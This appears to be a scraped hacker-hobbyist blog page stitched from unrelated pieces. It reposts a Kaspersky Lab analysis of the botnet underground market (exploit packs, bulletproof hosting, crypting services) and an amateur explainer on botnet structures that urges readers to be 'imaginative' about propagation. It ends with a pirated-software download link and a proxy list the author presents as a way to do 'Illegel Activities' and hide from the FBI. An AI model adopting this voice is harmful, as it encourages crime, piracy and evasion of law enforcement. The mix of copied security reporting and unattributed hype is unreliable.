But why was it necessary to create a monolithic executable file for the Mayday botnet? One possible reason is that the developers wished to make it harder for 'outsiders' to edit, reconfigure and resell a command and control center. Whatever the case, our analysis of the structure of server software used by the Mayday botnet shows that this was a serious development project (the code is tidy, a universal system of classes was devised for the application) that required a well-organized developer team. Moreover, to create software for the Mayday botnet, cybercriminals must have had to work on two projects rather than one, developing software both for Windows and for Linux.
Kaspersky Lab did not detect any new variants of the Mayday bot in spring 2008. Perhaps the malicious program's authors have taken a timeout and the Mayday botnet will resurface in the near future.

The botnet business

The answer to the question why botnets keep evolving and why they are coming to pose an increasingly serious threat lies in the underground market that has sprung up around them. Today, cybercriminals need neither specialized knowledge nor large amounts of money to get access to a botnet. The underground botnet industry provides everyone who wants to use a botnet with everything they need, including software, ready-to-use zombie networks and anonymous hosting services, at low prices.
Let's take a look at the 'dark side' of the Internet and see how the botnet industry works to benefit zombie network owners.
The first thing needed to create a botnet is a bot, i.e. a program that can remotely perform certain actions on a user's computer without the user's knowledge. Software for creating botnets can be easily purchased on the Internet by simply finding a appropriate advertisement and contacting the advertiser.


Figure 4. Advertisement for the sale of a bot and administration panel (translated from Russian)
Bot prices vary from $5 to $1000, depending on how widespread a bot is, whether it is detected by antivirus products, what commands it supports, etc.
A simple web-oriented botnet requires a hosting site where a command and control center can be located. Such sites are readily available, and come complete with support and anonymous access to the server (providers of anonymous hosting services usually guarantee that log files will not be accessible to anybody, including law enforcement agencies). Advertisements like the one shown below are abundant on the Internet.


Figure 5. Hosting services advertisement for would-be botnet owners
When a C&C site has been created, what's needed next are computers infected by a bot. One option is to buy a ready-made network with somebody else's bot installed. Since stealing botnets is a common practice, most buyers prefer to replace both the malicious programs and the command and control centers with their own, thereby gaining guaranteed control over the botnet. A command will be sent to the bot on the newly-purchased network to download and install a new bot (with a new C&C address) and then self-destruct. This replaces the 'wrong' bots and the botnet begins communicating with the new C&C center. This 'reloading' of botnets is also helpful for protecting them and ensuring anonymity, since IT security experts may already be aware of the 'old' C&C and the 'old' bot.
Unfortunately, building a new botnet is not very hard, either: tools that simplify this task are available. The most popular among them are software packages known as Mpack, Icepack and WebAttacker. They infect the systems of users who visit a malicious web page by exploiting vulnerabilities in browsers or browser plugins. Such software packages are called mass web infection systems or simply ExploitPacks. After an exploit has performed its function, the browser downloads an executable file from the Internet and runs it. The file is a bot program, which adds a new zombie computer to the botnet and gives control over it to the cybercriminal.
Sadly, these tools are so accessible that even adolescents can easily find them and they even try to make money by reselling them.


Figure 6. A 16-year-old selling Mpack
Interestingly, ExploitPacks were originally developed by Russian hackers but later they found an audience in other countries as well. These malicious programs have been localized (showing that they were commercially successful on the black market) and are now actively used in China, among other places.


Figure 7. The original Russian version of IcePack


Figure 8. A localized Chinese version of Icepack
The easier it is to use a system the more popular and successful it is with cybercriminals. Developers of such systems as C&C software or ExploitPacks realize this and develop user-friendly installation and configuration mechanisms for their products in order to make them more popular and increase demand.
For example, installation of a command and control center usually involves copying files onto a web server and using the browser to launch an install.php script. A web interface makes installation much easier: all a cybercriminal needs to do to configure and launch a command and control center is fill in all the web form fields correctly.


Figure 9. C&C web installer
It is well known in the cybercriminal world that sooner or later antivirus products will start detecting any bot program. When this happens, the infected machines on which an antivirus product is installed are lost to the cybercriminals, while the rate of new infections significantly deteriorates. Botnet owners use a number of methods to retain control of their networks, the most effective of which is protecting malicious programs from detection by processing the malicious code. The black market offers a broad range of services related to the encryption, packing and obfuscation of malicious code.

Figure 10. An advertisement offering help concealing code from antivirus products
Everything that is needed to successfully run a botnet is available on the Internet. At the moment, it's impossible to arrest the development of the botnet industry.

Conclusion

Today, botnets are among the main sources of illegal income on the Internet and they are powerful weapons in the hands of cybercriminals. It is totally unrealistic to expect that criminals will relinquish such an effective tool. Security experts view the future with some trepidation as they anticipate the continued development of botnet technologies.
What makes botnets increasingly dangerous is that they are becoming easier and easier to use. In the near future, even children will be able to manage them. The ability to gain access to a network of infected computers is determined by the amount of money cybercriminals have at their disposal rather than whether they have specialized knowledge. Additionally, the prices in the well-developed and structured botnet market are relatively low.
It may not only be cybercriminals who have an interest in creating international botnets. Such botnets can be used by governments or individuals to exert political pressure in tense situations. In addition, anonymous control of infected machines that does not depend on their geographic location could be used to provoke cyber conflicts. All this takes is organizing a cyber attack on one country's servers from computers located in another country.
Networks which unite the resources of tens or hundreds of thousands or even millions of infected computers, have the potential to be extremely dangerous – a potential which (luckily!) has not yet been fully exploited. Virtually all this cyber power stems from infected home computers, which make up the overwhelming majority of zombie machines exploited by cybercriminals.
Think of ten friends or acquaintances who have computers – out of the ten, one of them is likely to own a machine that is part of a zombie network. Could that person be you?
Source:
Kaspersky Lab
 

Botnet s a Serious Threat ???


What r BotNets???


 

This article i got n explain botnets, give an example of usage, and provide some good examples.
[What]
A botnet is a group of computers or servers all compromised with the same backdoor. The interesting thing about botnets is that these backdoors often have the ability to interact with other members of the botnet, and can also be controlled by the botnets owner. This can result in a single command, e.g. DDoS Microsoft.com, to flow down a chain of command in an instant, telling each member of the botnet to follow it. They also often leave backdoors accessible to the botnet user, and some even have built-in protocols for updating themselves. There are multiple chains of command that have been used in botnets, and these are:

P2P botnets, using these a command can be sent by the hacker to a single member of the botnet, and this single botnet will pass the command on to a handful of other members, which will carry on the chain and so on and so forth. the advantages of this are you cannot stop the botnet by taking out one member, but you would have to block the botnet completely. The problem is it is easy for individual bots to become separated from the rest of the net, usually resulting in being fixed.
Heirarchial botnets, which have different members assigned “ranks” in the command chain and are given specific bots to manage. Using this, the hacker might send a command to 4 different bots, which each pass the message on to 100, which each pass it on to 100. The problem with these is that the botnet can be shut down by removing the hack from one of the higher-up bots. The good thing about these is they can be very easily automated, and can pass reports of the computers up the chain as well as pass exploit upgrades down.
and single server bots, which all take their commands from one computer, these are very easy to make but are near enough useless.


[Propagation]
Botnets can be propagated by the hacker themselves, eg whenever they root a server or trojan a computer they add their program in too, run it and that computer becomes a bot. Another way is by mimicing worms and spreading through emails, p2p or instant messaging. Be imaginative, there are many ways of propagating that havent been tried yet.

[usage]
I will give an example of how a p2p botnet would be structured.
The bots propagation method is by exploiting a flaw in the security system of linux, and uses it to get root access.
The bot has a p2p structure, and can pass patches down the chain as well as commands.
The bot is automated by adding any computers it hacks to its own list of child bots(ones under its own command), and runs a check similar to ping to test if the net is up on the child before sending commands/patches.



[Famous Examples]


the storm worm:
This is an email-spread worm that takes over windows machines and injects a driver into the windows kernel to keep root. It currently has control of between 1- and 10- million windows machines around the world. It is extremely flexible, and has avoided gaining a signature for a massive amount of time.
There are many of examples on wikipedia of these, and google yields some interesting results.

Track Any E mail

Go to This Link n Register Yoself n Gret Trackeed Of all E Mails Sent Ba Yo Friends.....





www.mailtracking.com

Friday, 8 January 2010

Host A Web Server on Your Home computer

Opera Unite :


create a web server using your home computer by using HFS or Http file server. This solution uses a combination of technique which helps you create a file server for downloading music files or even hosting a small site for your family.
Today Opera came out with an extra ordinary application called as Opera Unite. This application turns any computer or device running Opera into a Web server
.  So how does it work ? Its pretty much the same what HFS was doing but its much more advanced.
  • First get a unique number for your computer.
  • Which is then linked to your computer.
  • Then you access the URL which in turn connects to the software running on your computer.
The advantage you get is all your IP is tracked automatically which was being done by the No-IP account.  I would call it as Just plug and play as you dont have to worry about configuring too much here.
You can find the complete and in depth tutorial by Opera Development Blog ( Via Boy Genius )




 FETCH LINK:


http://rs768.rapidshare.com/files/292619999/_www.dl4all.com_Opera_Unite_10.10.1833_Beta_Multilanguage_Portable_kastrioTT_.rar

Thursday, 7 January 2010

Proxy n IP Solutions

Fellas I give Some Proxy Softwares  Use Those To Do Illegel Activities..Its A FOOLPROOF sotfies..Newbies Take Car While Using It...





If u Use Those U can Play Hide N Seek Games With Any Security Org..Like FBI,CBI,JBI..etcetra...
Loook I m Not Kidding..!!




If u doesnt Know Frm Where 2 Fetch It...I Recommend Locate urself 2 www.filecrop.com




Free Proxy server softwares:

1. VPNs (Virtual Private Networks) :

To start with, I will put VPNs in first place. Virtual Private Networks (VPNs) not only help you unblock myspace, bebo, friendster or orkut login, but also help you to remain maximum anonymous on web.
I have informed you about two VPNs: Itshidden.com and CyberGhost proxy software.
I personally use Itshidden.com as my proxy server software as it is giving me good proxy speed. I have tried out CyberGhost even but Itshidden.com is much better than CyberGhost free proxy software.

2. Tor :

This is used on a large scale on internet to maintain online anonymity. This can also be used to get unblock proxy servers to unblock myspace, bebo, friendster, orkut login. Tor is a network of tunnels which allows users to maintain their privacy on internet. It is just same as VPNs.

3. Hotspot Shield :

I am really impressed with the speed of proxy servers it provides. It is one of the fastest proxy software I have seen. But, I am ranking it low because of its advertisements. Its free proxy server service shows you ads which is really annoying and you have to install addons like AdsBlockPlus to remove these ads. Otherwise, its the best proxy software.

4. Ultrasurf :

If you are looking for free full version proxy software, which can provide you mostly US based proxy servers to unblock myspace, bebo, friendster or orkut login, then you should use Ultrasurf and surely you’ll love it. It provides you with 3 proxy servers which are having good speed and it also displays the percentage of speed to help you choose best proxy server out of available 3 free proxy servers.

5. Hide my IP :

This proxy software was demanded to me by many readers and I received many emails after I posted an article on it. No doubt, Hide my IP is a good proxy software. But, it has its own drawback of trial version and you have to pay for using it for long time.

6. Hide Your IP Address :

This free proxy software not only provides you with free proxy servers, but also has useful proxy feature of Proxy Checker. You can adjust your level of anonymity and proxy server speed from setting tab of Hide Your IP address proxy software.
Also, there are other free proxy softwares like ProxyWay , ProxySwitcher which needs to be mentioned over here. I hope you all will be able to get your best free proxy software to unblock myspace, bebo, friendster, orkut login. If you have any problem in using free proxy softwares to unblock myspace, bebo, friendster, orkut login, please mention it in comments.
Enjoy free proxy softwares to unblock myspace, bebo, friendster, orkut login...